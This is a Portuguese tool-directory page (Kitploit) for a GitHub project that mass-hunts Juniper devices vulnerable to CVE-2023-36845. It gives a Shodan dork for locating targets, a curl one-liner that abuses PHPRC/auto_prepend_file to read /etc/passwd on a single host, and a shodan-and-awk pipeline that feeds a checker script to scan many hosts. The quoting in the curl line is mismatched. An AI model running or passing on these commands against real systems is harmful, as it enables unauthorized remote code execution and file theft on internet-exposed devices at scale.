Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Juniper-CVE-2023-36845-Mass-Hunting — Juniper RCE (Execução Remota de Código) CVE-2023-36845 é uma vulnerabilidade identificada no software da Juniper. Esta falha específica permite execução remota de código, o que significa que um atacante pode executar código arbitrário em um sistema sem precisar de acesso físico ao dispositivo. | Kitploit
Ferramentas/GitHubGitHub/jahithoque/juniper-cve-2023-36845-mass-hunting
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubjahithoque/juniper-cve-2023-36845-mass-hunting

Juniper-CVE-2023-36845-Mass-Hunting

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
12há 2 anosAinda não revisado

Sobre

Juniper RCE (Execução Remota de Código) CVE-2023-36845 é uma vulnerabilidade identificada no software da Juniper. Esta falha específica permite execução remota de código, o que significa que um atacante pode executar código arbitrário em um sistema sem precisar de acesso físico ao dispositivo.

Compartilhar

Juniper-CVE-2023-36845-Mass-Hunting

Juniper RCE (Execução Remota de Código) CVE-2023-36845 é uma vulnerabilidade identificada no software da Juniper. Esta falha específica permite execução remota de código, o que significa que um invasor pode executar código arbitrário em um sistema sem precisar de acesso físico ao dispositivo.

Como encontrar:

Dork do Shodan: http.favicon.hash:2141724739

use com outros dorks relevantes, como certificados SSL, nome da organização, etc., para uma pesquisa mais direcionada.

Exploração para um único host:

curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"’

Automação:

└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #baixar do shodan

└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt

└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt

└─# ./Juniper-RCE-check.sh -f juniper-final.txt IMAGE

Baixar ferramenta